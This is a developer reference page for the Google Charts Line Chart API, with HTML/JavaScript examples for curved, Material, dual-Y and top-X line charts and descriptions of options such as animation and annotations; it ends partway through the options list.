Digital data. From Wikipedia, the free encyclopedia. This article is about broad technical and mathematical information regarding digital data. For alternate or more specific uses, see Digital (disambiguation). Digital data, in information theory and information systems, are discrete, discontinuous representations of information or works, as contrasted with continuous, or analog, signals which behave in a continuous manner or represent information using a continuous function. Although digital representations are the subject matter of discrete mathematics, the information represented can be either discrete, such as numbers and letters, or continuous, such as sounds, images, and other measurements. The word digital comes from the same source as the words digit and digitus (the Latin word for finger), as fingers are often used for discrete counting. Mathematician George Stibitz of Bell Telephone Laboratories used the word digital in reference to the fast electric pulses emitted by a device designed to aim and fire anti-aircraft guns in 1942.[1] The term is most commonly used in computing and electronics, especially where real-world information is converted to binary numeric form, as in digital audio and digital photography. Symbol to digital conversion. Since symbols (for example, alphanumeric characters) are not continuous, representing symbols digitally is rather simpler than conversion of continuous or analog information to digital. Instead of sampling and quantization, as in analog-to-digital conversion, such techniques as polling and encoding are used. A symbol input device usually consists of a group of switches that are polled at regular intervals to see which switches are pressed. Data will be lost if, within a single polling interval, two switches are pressed, or a switch is pressed, released, and pressed again. This polling can be done by a specialized processor in the device to prevent burdening the main CPU. When a new symbol has been entered, the device typically sends an interrupt, in a specialized format, so that the CPU can read it. For devices with only a few switches (such as the buttons on a joystick), the status of each can be encoded as bits (usually 0 for released and 1 for pressed) in a single word. This is useful when combinations of key presses are meaningful, and is sometimes used for passing the status of modifier keys on a keyboard (such as shift and control). But it does not scale to support more keys than the number of bits in a single byte or word. Devices with many switches (such as a computer keyboard) usually arrange these switches in a scan matrix, with the individual switches on the intersections of x and y lines. When a switch is pressed, it connects the corresponding x and y lines together. Polling (often called scanning in this case) is done by activating each x line in sequence and detecting which y lines then have a signal, and thus which keys are pressed. When the keyboard processor detects that a key has changed state, it sends a signal to the CPU indicating the scan code of the key and its new state. The symbol is then encoded, or converted into a number, based on the status of modifier keys and the desired character encoding. A custom encoding can be used for a specific application with no loss of data. However, using a standard encoding such as ASCII is problematic if a symbol such as 'ß' needs to be converted but is not in the standard.
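The two encoding schemes just described can be sketched in a few lines of Python. This is an illustrative model only: the pin-access helpers are hypothetical stand-ins for real hardware I/O, and the 4x4 matrix size is arbitrary.

    # Hypothetical stand-ins for real hardware I/O on the scan lines.
    def drive_x_line(x, active):
        pass  # would energize or release x line number x

    def read_y_line(y):
        return False  # would return True if y line y carries a signal

    # (a) Few switches: pack each switch's state into one bit of a status word,
    # so combinations (e.g. shift + control) are visible in a single value.
    def pack_switches(states):  # states: list of 0/1, switch 0 in the low bit
        word = 0
        for i, pressed in enumerate(states):
            word |= pressed << i
        return word

    # (b) Many switches: scan the matrix by activating each x line in turn
    # and reading which y lines then carry a signal.
    def scan_matrix(n=4):
        pressed = []
        for x in range(n):
            drive_x_line(x, True)
            for y in range(n):
                if read_y_line(y):
                    pressed.append(x * n + y)  # a simple scan code
            drive_x_line(x, False)
        return pressed

    print(bin(pack_switches([1, 0, 1, 1])))  # 0b1101: switches 0, 2 and 3 pressed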
It is estimated that in the year 1986 less than 1% of the world's technological capacity to store information was digital, and in 2007 it was already 94%.[2] The year 2002 is assumed to be the year when humankind was able to store more information in digital than in analog format (the "beginning of the digital age").[3] Properties of digital information. All digital information possesses common properties that distinguish it from analog communications methods:
• Synchronization: Since digital information is conveyed by the sequence in which symbols are ordered, all digital schemes have some method for determining the beginning of a sequence. In written or spoken human languages, synchronization is typically provided by pauses (spaces), capitalization, and punctuation. Machine communications typically use special synchronization sequences.
• Language: All digital communications require a language, which in this context consists of all the information that the sender and receiver of the digital communication must both possess, in advance, in order for the communication to be successful. Languages are generally arbitrary and specify the meaning to be assigned to particular symbol sequences, the allowed range of values, methods to be used for synchronization, etc.
• Errors: Disturbances (noise) in analog communications invariably introduce some generally small deviation or error between the intended and actual communication. Disturbances in a digital communication do not result in errors unless the disturbance is so large as to result in a symbol being misinterpreted as another symbol or to disturb the sequence of symbols. It is therefore generally possible to have an entirely error-free digital communication. Further, techniques such as check codes may be used to detect errors and guarantee error-free communications through redundancy or retransmission. Errors in digital communications can take the form of substitution errors, in which a symbol is replaced by another symbol, or insertion/deletion errors, in which an extra incorrect symbol is inserted into or deleted from a digital message. Uncorrected errors in digital communications have unpredictable and generally large impact on the information content of the communication.
• Copying: Because of the inevitable presence of noise, making many successive copies of an analog communication is infeasible, because each generation increases the noise. Because digital communications are generally error-free, copies of copies can be made indefinitely.
• Granularity: The digital representation of a continuously variable analog value typically involves a selection of the number of symbols to be assigned to that value. The number of symbols determines the precision or resolution of the resulting datum. The difference between the actual analog value and the digital representation is known as quantization error. For example, if the actual temperature is 23.234456544453 degrees, but only two digits (23) are assigned to this parameter in a particular digital representation, the quantizing error is 0.234456544453. This property of digital communication is known as granularity.
• Compressible: According to Miller, "Uncompressed digital data is very large, and in its raw form would actually produce a larger signal (therefore be more difficult to transfer) than analog data. However, digital data can be compressed. Compression reduces the amount of bandwidth space needed to send information.
Data can be compressed, sent and then decompressed at the site of consumption. This makes it possible to send much more information and result in, for example, digital television signals offering more room on the airwave spectrum for more television channels."[4] Historical digital systems. Even though digital signals are generally associated with the binary electronic digital systems used in modern electronics and computing, digital systems are actually ancient, and need not be binary or electronic.[citation needed]
• Written text (due to the limited character set and the use of discrete symbols, the alphabet in most cases).
• The abacus was created sometime between 1000 BC and 500 BC and later became a widespread tool for calculation. It can be used as a basic digital calculator that uses beads on rows to represent numbers. Beads only have meaning in discrete up and down states, not in analog in-between states.
• A beacon is perhaps the simplest non-electronic digital signal, with just two states (on and off). In particular, smoke signals are one of the oldest examples of a digital signal, where an analog "carrier" (smoke) is modulated with a blanket to generate a digital signal (puffs) that conveys information.
• Morse code uses six digital states: dot, dash, intra-character gap (between each dot or dash), short gap (between each letter), medium gap (between words), and long gap (between sentences). These are used to send messages via a variety of potential carriers such as electricity or light, for example using an electrical telegraph or a flashing light.
• The Braille system was the first binary format for character encoding, using a six-bit code rendered as dot patterns.
• Flag semaphore uses rods or flags held in particular positions to send messages to the receiver watching them some distance away.
• International maritime signal flags have distinctive markings that represent letters of the alphabet to allow ships to send messages to each other.
• More recently invented, a modem modulates an analog "carrier" signal (such as sound) to encode binary electrical digital information, as a series of binary digital sound pulses. A slightly earlier, surprisingly reliable version of the same concept was to bundle a sequence of audio digital "signal" and "no signal" information (i.e. "sound" and "silence") on magnetic cassette tape for use with early home computers.
References. 1. ^ Ceruzzi, Paul E. (2012-06-29). Computing (MIT Press Essential Knowledge). MIT Press. 2. ^ "The World's Technological Capacity to Store, Communicate, and Compute Information", especially the Supporting online material, Martin Hilbert and Priscila López (2011), Science, 332(6025), 60–65; free access to the article at martinhilbert.net/WorldInfoCapacity.html. 3. ^ "Video animation on The World's Technological Capacity to Store, Communicate, and Compute Information from 1986 to 2010". 4. ^ Miller, Vincent (2011). Understanding Digital Culture, "Convergence and the contemporary media experience". London: Sage Publications. Further reading. Tocci, R. 2006. Digital Systems: Principles and Applications (10th Edition). Prentice Hall. ISBN 0-13-172579-3.
__label__pos
0.993518
Handout 4: Introduction to Probability (Feb 9, '09). INTRODUCTION TO PROBABILITY #4. The theory of probability provides the foundation for statistical inference.
BASIC TERMS. In probability, an experiment is an activity or occurrence with an observable result. Each repetition of an experiment is called a trial. The possible results of each trial are called outcomes or events. The set of all possible outcomes for an experiment is called the sample space for that experiment. For example, a sample space S for the experiment of tossing a coin is made up of two possible outcomes: heads (h) and tails (t). In set notation, we may write S = {h, t}. An event is a subset of a sample space. Events are designated with capital letters: A, B, ..., E, ..., which may have subscripts. Thus, in the experiment of tossing a coin, one of two mutually exclusive events may occur: the event A = {h}, which represents the outcome "heads", and the event B = {t}, which represents the outcome "tails". (Events are said to be mutually exclusive if no two of them can occur together.) Different types of events may be associated with the same experiment, and an experiment may have more than one sample space associated with it. Example: for the experiment of rolling a single fair six-sided die, if we consider events like showing a single number on the top face, then we may introduce a sample space (of size 6) S = {1, 2, 3, 4, 5, 6}, which includes six possible mutually exclusive outcomes. But we may also associate other events with this experiment:
a) the die shows an odd number: there are three possible events of this type, E_1a = {1}, E_2a = {3}, E_3a = {5}, and the corresponding sample space (of size 3) is S_a = {1, 3, 5};
b) the die shows a number greater than 2: there are four possible events of this type, E_1b = {3}, E_2b = {4}, E_3b = {5}, E_4b = {6}, and the corresponding sample space (of size 4) is S_b = {3, 4, 5, 6};
c) the die shows a multiple of 3: there are two possible events of this type, E_1c = {3} and E_2c = {6}, and the sample space (of size 2) is S_c = {3, 6}.
A probability of an event
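A short Python sketch of the die example above. It assumes a fair die, so every outcome is equally likely; the probability rule P(E) = |E|/|S| used here is the standard classical definition, supplied by us rather than taken from the (truncated) handout.

    from fractions import Fraction

    S = {1, 2, 3, 4, 5, 6}  # sample space for one roll of a fair die

    def prob(event, space=S):
        # Classical probability for equally likely outcomes: P(E) = |E| / |S|.
        return Fraction(len(event & space), len(space))

    S_a = {1, 3, 5}     # the die shows an odd number
    S_b = {3, 4, 5, 6}  # the die shows a number greater than 2
    S_c = {3, 6}        # the die shows a multiple of 3

    print(prob(S_a))  # 1/2
    print(prob(S_b))  # 2/3
    print(prob(S_c))  # 1/3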
__label__pos
0.996293
Navigating Mobile Security: Protecting Your Device in an Evolving Threat Landscape In an era where smartphones have become an integral part of our daily lives, ensuring the security of these devices is paramount. As technology advances, so do the threats to mobile security, ranging from malware and phishing attacks to data breaches and identity theft. Navigating the complex landscape of mobile security requires vigilance, awareness, and proactive measures to safeguard your device and personal information. Let’s explore how you can protect your device in an evolving threat landscape. 1. Keep Your Software Updated One of the most effective ways to protect your device is to keep its software updated regularly. Operating system updates and security patches often contain fixes for vulnerabilities that could be exploited by cybercriminals. Enable automatic updates on your device to ensure that you receive the latest security enhancements promptly. 2. Use Strong Authentication Methods Protect your device with strong authentication methods such as biometric authentication (e.g., fingerprint or face recognition) or secure PIN codes. These additional layers of security make it harder for unauthorized users to access your device and personal data, even if your device is lost or stolen. 3. Be Wary of App Permissions Before installing any app on your device, carefully review the permissions it requests. Avoid granting unnecessary permissions that could potentially compromise your privacy and security. Be particularly cautious of apps that request access to sensitive information or device features without a valid reason. 4. Install Antivirus and Security Software Consider installing reputable antivirus and security software on your device to detect and remove malware, phishing attempts, and other threats. These security solutions offer features such as real-time scanning, malicious website blocking, and remote device locking or wiping in case of theft or loss. 5. Secure Your Network Connections When connecting to Wi-Fi networks, prioritize secure connections over public or unsecured networks. Avoid transmitting sensitive information over unencrypted connections, and use virtual private network (VPN) services when accessing public Wi-Fi networks to encrypt your data and protect your privacy. 6. Enable Remote Tracking and Wiping Take advantage of built-in features such as “Find My Device” (Android) or “Find My iPhone” (iOS) to remotely track, lock, or erase your device in case it is lost or stolen. These features provide peace of mind and can help prevent unauthorized access to your personal information. 7. Exercise Caution with Links and Downloads Be cautious when clicking on links or downloading files from unknown or suspicious sources, as they may contain malware or phishing attempts. Verify the authenticity of websites and sources before providing any personal information or downloading content to your device. 8. Backup Your Data Regularly Regularly back up your device data to a secure cloud storage service or external storage device. In the event of a security incident or device failure, having backups ensures that you can restore your data and minimize potential loss or damage. 9. Educate Yourself About Security Best Practices Stay informed about the latest security threats and best practices for mobile device security.
Educate yourself about common attack vectors, phishing scams, and security vulnerabilities to mitigate risks effectively. By staying vigilant and proactive, you can better protect your device and personal information in an evolving threat landscape. In conclusion, navigating mobile security requires a proactive approach and a combination of preventive measures, awareness, and caution. By following these tips and implementing security best practices, you can safeguard your device and personal information from the ever-present threats in today’s digital world. Remember, staying informed and vigilant is key to protecting your mobile device in an evolving threat landscape.
__label__pos
0.873052
This page is a snapshot from the LWG issues list; see the Library Active Issues List for more information and the meaning of WP status. 3546. common_iterator's postfix-proxy is not quite right. Section: 25.5.5.5 [common.iter.nav]. Status: WP. Submitter: Tim Song. Opened: 2021-04-23. Last modified: 2021-06-12. Priority: Not Prioritized. View all other issues in [common.iter.nav]. View all issues with WP status. Discussion: P2259R1 modeled common_iterator::operator++(int)'s postfix-proxy class on the existing proxy class used by common_iterator::operator->, but in doing so it overlooked two differences. The proposed wording has been implemented and tested. [2021-05-10; Reflector poll] Set status to Tentatively Ready after five votes in favour during reflector poll. [2021-05-17; Reflector poll] Set status to Tentatively Ready after five votes in favour during reflector poll. [2021-06-07 Approved at June 2021 virtual plenary. Status changed: Voting → WP.] Proposed resolution: This wording is relative to N4885. 1. Modify 25.5.5.5 [common.iter.nav] as indicated:

decltype(auto) operator++(int);

-4- Preconditions: holds_alternative<I>(v_) is true.
-5- Effects: If I models forward_iterator, equivalent to:

    common_iterator tmp = *this;
    ++*this;
    return tmp;

Otherwise, if requires (I& i) { { *i++ } -> can-reference; } is true or constructible_from<iter_value_t<I>, iter_reference_t<I>> && move_constructible<iter_value_t<I>> is false, equivalent to:

    return get<I>(v_)++;

Otherwise, equivalent to:

    postfix-proxy p(**this);
    ++*this;
    return p;

where postfix-proxy is the exposition-only class:

    class postfix-proxy {
      iter_value_t<I> keep_;
      postfix-proxy(iter_reference_t<I>&& x)
        : keep_(std::forward<iter_reference_t<I>>(x)) {}
    public:
      const iter_value_t<I>& operator*() const {
        return keep_;
      }
    };
World Cancer Day: I can make healthy lifestyle choices

Taking place under the tagline 'We can. I can.', World Cancer Day 2016-2018 will explore how everyone – as a collective or as individuals – can do their part to reduce the global burden of cancer.

Diagnosing cancer isn't always easy – not all cancers show early signs and symptoms, and other warning signs appear quite late, when the cancer is advanced. Everyone can take steps to reduce their risk of cancer by choosing healthy options, including quitting smoking, keeping physically active and choosing healthy food and drinks.

Tobacco use is the single largest preventable cause of cancer globally. Quitting smoking will have a major positive impact on an individual's health and that of their families and friends. The good news is that quitting at any age is beneficial, increasing life expectancy and improving quality of life.

Individuals can also reduce their risk of many common cancers by maintaining a healthy weight and making physical activity part of their everyday lives. Being overweight or obese increases the risk of ten cancers – bowel, breast, uterine, ovarian, pancreatic, oesophagus, kidney, liver, advanced prostate and gallbladder cancers.

Specific changes to a person's diet can also make a difference – for example, individuals can limit their intake of red meat and avoid processed meat. Alcohol is also strongly linked with an increased risk of several cancers. Reducing alcohol consumption decreases the risk of cancers of the mouth, pharynx, larynx, oesophagus, bowel, liver and breast.

Overall, more than a third of common cancers could be prevented by a healthy diet, being physically active and maintaining a healthy body weight. Reducing exposure to ultraviolet (UV) radiation from the sun and other sources, such as solariums, is also important to reduce the risk of many skin cancers.
At a glance

Also known as: ZPP; ZP; free erythrocyte protoporphyrin; FEP

Why get tested?
To screen for and monitor chronic exposure to lead; to detect iron deficiency in children.

When to get tested?
When you have been chronically exposed to lead, as part of a programme to monitor lead exposure, and/or when your doctor suspects lead poisoning; as part of a screening programme for iron deficiency in children and adolescents.

Sample required?
A blood sample drawn from a vein in your arm or from a fingerstick.

What is being tested?

The zinc protoporphyrin (ZPP) test is a blood test that can identify a disruption in the formation of haem. Haem is an essential component of haemoglobin, the protein in red blood cells (RBC) that carries oxygen from the lungs to the body's tissues and cells. The formation of haem occurs in a series of enzymatic steps that conclude with the insertion of an iron atom into the centre of a molecule called protoporphyrin. If there is not enough iron available, protoporphyrin combines with zinc instead of iron to form zinc protoporphyrin. Lead also inhibits haem synthesis and can therefore cause an increase in RBC ZPP. Since it cannot transport oxygen, ZPP serves no useful purpose in the RBC that contain it.

ZPP is usually measured relative to the amount of haemoglobin. The ZPP/haem ratio gives the proportion of ZPP compared to haem in red blood cells. ZPP itself is measured in two ways. Some methods measure total erythrocyte protoporphyrin, which includes both ZPP (more than 90% of the protoporphyrin in red blood cells) and free protoporphyrin (FEP), which is not bound to zinc. As ZPP usually makes up most of the total erythrocyte protoporphyrin, the inability of these methods to distinguish ZPP from FEP is not considered significant. Other methods, which are able to discriminate between ZPP and FEP, measure only ZPP.

How is the sample collected for testing?

To measure ZPP, a blood sample is taken by inserting a needle into a vein in your arm. To determine the ZPP/haem ratio, a drop of blood from a fingerstick is placed in an instrument called a haematofluorometer. This instrument measures the fluorescence of ZPP and reports the amount of ZPP per number of haem molecules. Since only a single drop of blood is required, this test is well suited for screening children.

Is any test preparation needed to ensure the quality of the sample?
No test preparation is needed.

The Test

How is it used?

Zinc protoporphyrin is primarily ordered to detect and monitor chronic exposure to lead in adults. In screening programmes it can be used to detect iron deficiency in children.

ZPP may be ordered, along with a lead level, to test for chronic lead exposure. Hobbyists who work with products containing lead and people who live in older houses may be at an increased risk of developing lead poisoning, because lead is usually ingested or inhaled. Those who inhale dust that contains lead, handle lead directly and then eat, or, in the case of children, eat paint chips that contain lead (common in houses built prior to 1960) can have elevated levels of lead and ZPP in their body.

ZPP is not sensitive enough for use as a screening test in children, as values do not rise until lead concentrations exceed the acceptable range.
The maximum lead concentrations considered safe in children have been set at a very low level by the Centers for Disease Control and Prevention (CDC) in the USA and the National Health and Medical Research Council (NHMRC) in Australia to minimise the negative impact of lead exposure on their development. In this age group, blood lead measurements should be done to detect exposure to lead.

In children, the ZPP/haem ratio is sometimes ordered as an early indicator of iron deficiency. An increase in the ZPP/haem ratio is one of the first signs of insufficient iron stores and will be elevated in most young people before signs or symptoms of anaemia are present. More specific tests of iron status are required to confirm iron deficiency.

When is it requested?

ZPP is ordered along with lead for adults when chronic exposure to lead is suspected, when an employee is a participant in an occupational lead monitoring programme, or when someone has a hobby, such as stained glass working, that brings them into frequent contact with lead. The ZPP/haem ratio is ordered as a screening test for iron deficiency in children and adolescents and/or when iron deficiency is suspected.

What does the test result mean?

The ZPP concentration in blood is usually very low. An increase in ZPP indicates a disruption of normal haem production but is not specific as to its cause. The main reasons for increases in ZPP are iron deficiency and lead poisoning. It is important that ZPP levels be evaluated in the context of a patient's history, clinical findings, and the results of other tests such as ferritin, lead, and a full blood count (FBC). It is possible that the patient may have both iron deficiency and lead poisoning.

In cases of chronic lead exposure, ZPP reflects the average lead level over the previous 3-4 months. However, the amount of lead currently present in the blood and the burden of lead in the body (the amount in the organs and bones) cannot be determined with a ZPP test. Values for ZPP rise more slowly than blood lead concentration following exposure, and they take longer to drop after exposure to lead has ceased. ZPP remains useful for ongoing monitoring of individuals with confirmed elevated lead levels who are on treatment.

An increase in the ZPP/haem ratio in a child is most often due to iron deficiency. A decreasing ZPP/haem ratio over time following iron supplementation likely indicates an increase in iron availability.

Is there anything else I should know?

An increased ZPP level is also seen in erythropoietic porphyrias, but these hereditary diseases are much less common than iron deficiency or lead poisoning. ZPP may be elevated in inflammatory conditions, anaemia of chronic disease, infections, and several blood-related diseases, but it is not generally used to monitor or diagnose these conditions. Depending on the method used to test ZPP, other substances in the blood that fluoresce, such as bilirubin and riboflavin, can produce false positive results. Falsely low values may occur if the sample is not protected from light before testing.

Common Questions

Besides ZPP and lead levels, what other tests might my physician order to monitor exposure to lead?
If you are in an occupational setting where you are frequently exposed to lead, your physician may order further tests to evaluate your kidneys and red blood cell production.

Last Review Date: March 21, 2021
Line Chart

Overview

A line chart that is rendered within the browser using SVG or VML. Displays tooltips when hovering over points.

Examples

Curving the Lines

You can smooth the lines by setting the curveType option to 'function'. The code to generate this chart is below. Note the use of the curveType: 'function' option:

  <html>
    <head>
      <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
      <script type="text/javascript">
        google.charts.load('current', {'packages':['corechart']});
        google.charts.setOnLoadCallback(drawChart);

        function drawChart() {
          var data = google.visualization.arrayToDataTable([
            ['Year', 'Sales', 'Expenses'],
            ['2004', 1000, 400],
            ['2005', 1170, 460],
            ['2006', 660, 1120],
            ['2007', 1030, 540]
          ]);

          var options = {
            title: 'Company Performance',
            curveType: 'function',
            legend: { position: 'bottom' }
          };

          var chart = new google.visualization.LineChart(document.getElementById('curve_chart'));

          chart.draw(data, options);
        }
      </script>
    </head>
    <body>
      <div id="curve_chart" style="width: 900px; height: 500px"></div>
    </body>
  </html>

Creating Material Line Charts

In 2014, Google announced guidelines intended to support a common look and feel across its properties and apps (such as Android apps) that run on Google platforms. We call this effort Material Design. We'll be providing "Material" versions of all our core charts; you're welcome to use them if you like how they look.

Creating a Material Line Chart is similar to creating what we'll now call a "Classic" Line Chart. You load the Google Visualization API (although with the 'line' package instead of the 'corechart' package), define your datatable, and then create an object (but of class google.charts.Line instead of google.visualization.LineChart).

Note: Material Charts will not work in old versions of Internet Explorer. (IE8 and earlier versions don't support SVG, which Material Charts require.)

Material Line Charts have many small improvements over Classic Line Charts, including an improved color palette, rounded corners, clearer label formatting, tighter default spacing between series, softer gridlines, and titles (and the addition of subtitles).

  google.charts.load('current', {'packages':['line']});
  google.charts.setOnLoadCallback(drawChart);

  function drawChart() {
    var data = new google.visualization.DataTable();
    data.addColumn('number', 'Day');
    data.addColumn('number', 'Guardians of the Galaxy');
    data.addColumn('number', 'The Avengers');
    data.addColumn('number', 'Transformers: Age of Extinction');

    data.addRows([
      [1, 37.8, 80.8, 41.8],
      [2, 30.9, 69.5, 32.4],
      [3, 25.4, 57, 25.7],
      [4, 11.7, 18.8, 10.5],
      [5, 11.9, 17.6, 10.4],
      [6, 8.8, 13.6, 7.7],
      [7, 7.6, 12.3, 9.6],
      [8, 12.3, 29.2, 10.6],
      [9, 16.9, 42.9, 14.8],
      [10, 12.8, 30.9, 11.6],
      [11, 5.3, 7.9, 4.7],
      [12, 6.6, 8.4, 5.2],
      [13, 4.8, 6.3, 3.6],
      [14, 4.2, 6.2, 3.4]
    ]);

    var options = {
      chart: {
        title: 'Box Office Earnings in First Two Weeks of Opening',
        subtitle: 'in millions of dollars (USD)'
      },
      width: 900,
      height: 500
    };

    var chart = new google.charts.Line(document.getElementById('linechart_material'));

    chart.draw(data, google.charts.Line.convertOptions(options));
  }

The Material Charts are in beta. The appearance and interactivity are largely final, but many of the options available in Classic Charts are not yet available in them. You can find a list of options that are not yet supported in this issue.
Also, the way options are declared is not finalized, so if you are using any of the classic options, you must convert them to material options by replacing this line:

  chart.draw(data, options);

...with this:

  chart.draw(data, google.charts.Line.convertOptions(options));

Dual-Y Charts

Sometimes you'll want to display two series in a line chart, with two independent y-axes: a left axis for one series, and a right axis for another. Note that not only are our two y-axes labeled differently ("Temps" versus "Daylight") but they each have their own independent scales and gridlines. If you want to customize this behavior, use the vAxis.gridlines and vAxis.viewWindow options.

In the Material code below, the axes and series options together specify the dual-Y appearance of the chart. The series option specifies which axis to use for each ('Temps' and 'Daylight'; they needn't have any relation to the column names in the datatable). The axes option then makes this chart a dual-Y chart, placing the 'Temps' axis on the left and the 'Daylight' axis on the right.

In the Classic code, this differs slightly. Rather than the axes option, you will use the vAxes option (or hAxes on horizontally oriented charts). Also, instead of using names, you will use the index numbers to coordinate a series with an axis using the targetAxisIndex option.

Material

  var materialOptions = {
    chart: {
      title: 'Average Temperatures and Daylight in Iceland Throughout the Year'
    },
    width: 900,
    height: 500,
    series: {
      // Gives each series an axis name that matches the Y-axis below.
      0: {axis: 'Temps'},
      1: {axis: 'Daylight'}
    },
    axes: {
      // Adds labels to each axis; they don't have to match the axis names.
      y: {
        Temps: {label: 'Temps (Celsius)'},
        Daylight: {label: 'Daylight'}
      }
    }
  };

Classic

  var classicOptions = {
    title: 'Average Temperatures and Daylight in Iceland Throughout the Year',
    width: 900,
    height: 500,
    // Gives each series an axis that matches the vAxes number below.
    series: {
      0: {targetAxisIndex: 0},
      1: {targetAxisIndex: 1}
    },
    vAxes: {
      // Adds titles to each axis.
      0: {title: 'Temps (Celsius)'},
      1: {title: 'Daylight'}
    },
    hAxis: {
      ticks: [new Date(2014, 0), new Date(2014, 1), new Date(2014, 2),
              new Date(2014, 3), new Date(2014, 4), new Date(2014, 5),
              new Date(2014, 6), new Date(2014, 7), new Date(2014, 8),
              new Date(2014, 9), new Date(2014, 10), new Date(2014, 11)]
    },
    vAxis: {
      viewWindow: {
        max: 30
      }
    }
  };

Top-X Charts

Note: Top-X axes are available only for Material charts (i.e., those with package line).
If you want to put the X-axis labels and title on the top of your chart rather than the bottom, you can do that in Material charts with the axes.x option:

  <html>
    <head>
      <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
      <script type="text/javascript">
        google.charts.load('current', {'packages':['line']});
        google.charts.setOnLoadCallback(drawChart);

        function drawChart() {
          var data = new google.visualization.DataTable();
          data.addColumn('number', 'Day');
          data.addColumn('number', 'Guardians of the Galaxy');
          data.addColumn('number', 'The Avengers');
          data.addColumn('number', 'Transformers: Age of Extinction');

          data.addRows([
            [1, 37.8, 80.8, 41.8],
            [2, 30.9, 69.5, 32.4],
            [3, 25.4, 57, 25.7],
            [4, 11.7, 18.8, 10.5],
            [5, 11.9, 17.6, 10.4],
            [6, 8.8, 13.6, 7.7],
            [7, 7.6, 12.3, 9.6],
            [8, 12.3, 29.2, 10.6],
            [9, 16.9, 42.9, 14.8],
            [10, 12.8, 30.9, 11.6],
            [11, 5.3, 7.9, 4.7],
            [12, 6.6, 8.4, 5.2],
            [13, 4.8, 6.3, 3.6],
            [14, 4.2, 6.2, 3.4]
          ]);

          var options = {
            chart: {
              title: 'Box Office Earnings in First Two Weeks of Opening',
              subtitle: 'in millions of dollars (USD)'
            },
            width: 900,
            height: 500,
            axes: {
              x: {
                0: {side: 'top'}
              }
            }
          };

          var chart = new google.charts.Line(document.getElementById('line_top_x'));
          chart.draw(data, google.charts.Line.convertOptions(options));
        }
      </script>
    </head>
    <body>
      <div id="line_top_x"></div>
    </body>
  </html>

Loading

The google.charts.load package name is "corechart", and the visualization's class name is google.visualization.LineChart.

  google.charts.load("current", {packages: ["corechart"]});

  var visualization = new google.visualization.LineChart(container);

For Material Line Charts, the google.charts.load package name is "line", and the visualization's class name is google.charts.Line.

  google.charts.load("current", {packages: ["line"]});

  var visualization = new google.charts.Line(container);

Data Format

Rows: Each row in the table represents a set of data points with the same x-axis location.

Columns:
• Column 0 - the domain column (role: domain).
• Columns 1 through N - values for lines 1 through N (data type: number; role: data).
• Optional column roles may follow each data column.

Configuration Options

aggregationTarget

How multiple data selections are rolled up into tooltips:
• 'category': Group selected data by x-value.
• 'series': Group selected data by series.
• 'auto': Group selected data by x-value if all selections have the same x-value, and by series otherwise.
• 'none': Show only one tooltip per selection.

aggregationTarget will often be used in tandem with selectionMode and tooltip.trigger, e.g.:

  var options = {
    // Allow multiple simultaneous selections.
    selectionMode: 'multiple',
    // Trigger tooltips on selections.
    tooltip: {trigger: 'selection'},
    // Group selections by x-value.
    aggregationTarget: 'category',
  };

Type: string
Default: 'auto'

animation.duration

The duration of the animation, in milliseconds. For details, see the animation documentation.

Type: number
Default: 0

animation.startup

Determines if the chart will animate on the initial draw. If true, the chart will start at the baseline and animate to its final state.

Type: boolean
Default: false

animation.easing

The easing function applied to the animation. The following options are available (a short sketch combining the animation options follows this list):
• 'linear' - Constant speed.
• 'in' - Ease in - Start slow and speed up.
• 'out' - Ease out - Start fast and slow down.
• 'inAndOut' - Ease in and out - Start slow, speed up, then slow down.

Type: string
Default: 'linear'
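As a minimal illustrative sketch (not from the original reference; the element id 'anim_chart' is invented, and 'data' is assumed to be a data table like the ones in the examples above), the animation options combine like this on a Classic line chart:

  var options = {
    title: 'Company Performance',
    animation: {
      startup: true,       // animate from the baseline on the first draw()
      duration: 750,       // milliseconds
      easing: 'inAndOut'
    }
  };

  var chart = new google.visualization.LineChart(document.getElementById('anim_chart'));
  chart.draw(data, options);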
annotations.boxStyle

For charts that support annotations, the annotations.boxStyle object controls the appearance of the boxes surrounding annotations:

  var options = {
    annotations: {
      boxStyle: {
        // Color of the box outline.
        stroke: '#888',
        // Thickness of the box outline.
        strokeWidth: 1,
        // x-radius of the corner curvature.
        rx: 10,
        // y-radius of the corner curvature.
        ry: 10,
        // Attributes for linear gradient fill.
        gradient: {
          // Start color for gradient.
          color1: '#fbf6a7',
          // Finish color for gradient.
          color2: '#33b679',
          // Where on the boundary to start and end the color1/color2
          // gradient, relative to the upper left corner of the boundary.
          x1: '0%', y1: '0%',
          x2: '100%', y2: '100%',
          // If true, the boundary for x1, y1, x2, and y2 is the box.
          // If false, it's the entire chart.
          useObjectBoundingBoxUnits: true
        }
      }
    }
  };

This option is currently supported for area, bar, column, combo, line, and scatter charts. It is not supported by the Annotation Chart.

Type: object
Default: null

annotations.datum

For charts that support annotations, the annotations.datum object lets you override Google Charts' choice for annotations provided for individual data elements (such as values displayed with each bar on a bar chart). You can control the color with annotations.datum.stem.color, the stem length with annotations.datum.stem.length, and the style with annotations.datum.style.

Type: object
Default: color is "black"; length is 12; style is "point".

annotations.domain

For charts that support annotations, the annotations.domain object lets you override Google Charts' choice for annotations provided for a domain (the major axis of the chart, such as the X axis on a typical line chart). You can control the color with annotations.domain.stem.color, the stem length with annotations.domain.stem.length, and the style with annotations.domain.style.

Type: object
Default: color is "black"; length is 5; style is "point".

annotations.highContrast

For charts that support annotations, the annotations.highContrast boolean lets you override Google Charts' choice of the annotation color. By default, annotations.highContrast is true, which causes Charts to select an annotation color with good contrast: light colors on dark backgrounds, and dark on light. If you set annotations.highContrast to false and don't specify your own annotation color, Google Charts will use the default series color for the annotation.

Type: boolean
Default: true

annotations.stem

For charts that support annotations, the annotations.stem object lets you override Google Charts' choice for the stem style. You can control the color with annotations.stem.color and the stem length with annotations.stem.length. Note that the stem length option has no effect on annotations with style 'line': for 'line' datum annotations, the stem length is always the same as the text, and for 'line' domain annotations, the stem extends across the entire chart.

Type: object
Default: color is "black"; length is 5 for domain annotations and 12 for datum annotations.

annotations.style

For charts that support annotations, the annotations.style option lets you override Google Charts' choice of the annotation type. It can be either 'line' or 'point'.
Type: string
Default: 'point'

annotations.textStyle

For charts that support annotations, the annotations.textStyle object controls the appearance of the text of the annotation:

  var options = {
    annotations: {
      textStyle: {
        fontName: 'Times-Roman',
        fontSize: 18,
        bold: true,
        italic: true,
        // The color of the text.
        color: '#871b47',
        // The color of the text outline.
        auraColor: '#d799ae',
        // The transparency of the text.
        opacity: 0.8
      }
    }
  };

